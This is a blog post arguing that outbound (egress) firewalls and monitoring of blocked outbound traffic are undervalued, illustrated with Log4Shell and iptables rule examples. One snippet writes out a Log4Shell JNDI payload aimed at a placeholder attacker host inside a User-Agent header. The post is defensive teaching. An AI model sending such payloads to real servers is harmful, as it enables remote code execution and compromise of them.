The most common firewall setups reject inbound traffic initiated from the internet, but let all traffic pass as long as the connection was initiated from the intranet. I strongly believe that such firewalls are overrated and that it makes as much sense (maybe even more sense) to filter outbound traffic.

The Log4Shell case

Yesterday some of us got quite busy patching things and searching for vulnerable software due to the Log4Shell 0-day exploit. This one was quite nasty - Log4j is the most common logging library in Java, and it would execute arbitrary code fetched from the internet whenever a string like ${jndi:ldap://.../exploit.class} was logged. Many servers log things like the URL, the referrer URL and the User-Agent sent by the client, which means anyone with a bit of technical insight can easily run arbitrary code on many of the affected servers. A race ensued between system administrators making workarounds and patches, and malicious parties scanning the internet for easily exploitable servers and gaining a foothold on them.
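As a sketch of how trivial the delivery is: the attacker only has to get the exploit string into any logged field. The host names below are placeholders, not real addresses.

```shell
# Hypothetical illustration only - attacker.example and victim.example
# are placeholders. Single quotes keep ${...} literal in the shell.
UA='${jndi:ldap://attacker.example/exploit.class}'

# This is roughly what the logged request would look like; if a vulnerable
# Log4j logs the User-Agent header, the JNDI lookup fires on the server.
printf 'GET / HTTP/1.1\nHost: victim.example\nUser-Agent: %s\n\n' "$UA"
```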

How firewalls may help

A regular ingress firewall may protect a company-internal server from being directly exploited by random people on the internet, but it will neither protect public servers from being exploited nor backend servers from being indirectly exploited (by traffic passed on from the internet through frontends). However, if the application can’t reach the attacker-controlled server hosting the malicious code, the attack above will fail. With such a firewall in place, a scanned host simply won’t show up on the list of vulnerable servers. I think it’s a good security policy to block all outgoing traffic except what is explicitly whitelisted.
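A minimal sketch of such an egress whitelist with iptables could look like the following. The addresses are assumptions (RFC 5737 documentation addresses used as placeholders), and the rules must be adapted to the services the server actually needs.

```shell
# Egress-whitelist sketch (run as root; addresses are placeholders).
# Allow replies on already-established connections:
iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
# Allow DNS to a known resolver and traffic to one whitelisted service:
iptables -A OUTPUT -p udp --dport 53 -d 192.0.2.53 -j ACCEPT   # placeholder resolver
iptables -A OUTPUT -d 192.0.2.10 -j ACCEPT                     # placeholder whitelisted host
# Drop everything else:
iptables -A OUTPUT -j DROP
```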

This one may be an exception though - with most remote code exploits, the payload is typically sent with the request itself. An egress firewall can’t help against that - but in practice, often only a minimal exploit code is sent in the request, and when executed it will try to download some larger payload and execute it. In such cases the egress firewall will not really protect against the vulnerability being found or exploited, but it will make it less likely that the computer is compromised by some arbitrary attacker. This may be just what’s needed to win the race and patch the 0-day vulnerability before the server is seriously compromised (ideally one should take down the server as soon as the vulnerability is known and bring it up again only when the vulnerability has been patched - but for quite a few of our customers, “uptime” is just too important).

I think that a firewall should never be regarded as more than “defence in depth”. Whatever services you have, they should be secure enough in themselves to survive being exposed to the open Internet. One should never assume that a client or a server is to be trusted just based on its IP address. In my opinion the primary purpose of a firewall is to reduce the risk of compromise due to a 0-day or some as-yet-unknown exploit.

A poor man’s IDS

By not only rejecting unknown outbound traffic, but also having strong monitoring in place on all the blocked outbound traffic, one already has a very simple IDS. This is relatively easy to do on the outbound side: for a well-managed server there should be no outbound traffic blocked by the firewall at all, so the noise level should be low. (One cannot monitor the inbound firewall in the same way; any computer connected to the internet is bombarded with intrusion attempts, so those logs are littered with noise.) Such a “poor man’s IDS” is of course not perfect - a sophisticated and dedicated attacker aware of the firewall policies will probably manage to compromise the server without getting caught by the firewall monitoring - but then again, no IDS is perfect.
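One way to sketch this with iptables is to send blocked packets through a dedicated chain that logs before dropping, rate-limited so a noisy process can’t flood the logs. The chain name and log prefix are arbitrary choices, not a standard.

```shell
# "Poor man's IDS" sketch (run as root). Blocked outbound packets are
# logged to the kernel log before being dropped.
iptables -N EGRESS_DENY
# This should come after the whitelist ACCEPT rules in the OUTPUT chain:
iptables -A OUTPUT -j EGRESS_DENY
# Log at most 5 packets/minute, then drop:
iptables -A EGRESS_DENY -m limit --limit 5/min -j LOG --log-prefix "egress-blocked: "
iptables -A EGRESS_DENY -j DROP
```

Alerting on any line matching the log prefix then gives a crude but low-noise intrusion signal.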

Difficulties with egress firewall

Maintaining an outbound firewall is admittedly a lot harder than maintaining an inbound firewall. Developers will often expect that external resources are easily available and deliver applications that simply won’t work with an egress firewall in place. The external resources are often hosted in the cloud and may sit behind an ever-changing jungle of IP addresses. One workaround may be to set up a proxy server on a dedicated VM with a wide-open egress policy (actually, maybe a dedicated VM isn’t needed - iptables supports rules based on the uid/gid of the local process). I think it’s worth the extra cost.
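The uid-based variant can be sketched with the iptables owner match. The account name is an assumption; the rule must come before the final DROP in the OUTPUT chain.

```shell
# Sketch (run as root): only processes running as "proxyuser" may open
# outbound HTTP/HTTPS connections; everything else still hits the
# whitelist/drop rules further down the OUTPUT chain.
iptables -A OUTPUT -p tcp -m multiport --dports 80,443 \
         -m owner --uid-owner proxyuser -j ACCEPT
```

Applications are then pointed at the local proxy instead of talking to the internet directly.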

My conclusion

I don’t consider a firewall a silver bullet against anything, but I would still encourage you to filter out all unknown outbound traffic and to monitor the traffic being blocked by the egress firewall.

Tobias Brox

Senior Systems Consultant at Redpill Linpro

Tobias started working as a developer when he finished his degree at The University of Tromsø. He joined Redpill Linpro as a system administrator 5 years ago, and has embraced working with our customers and maintaining/improving our internal tools.

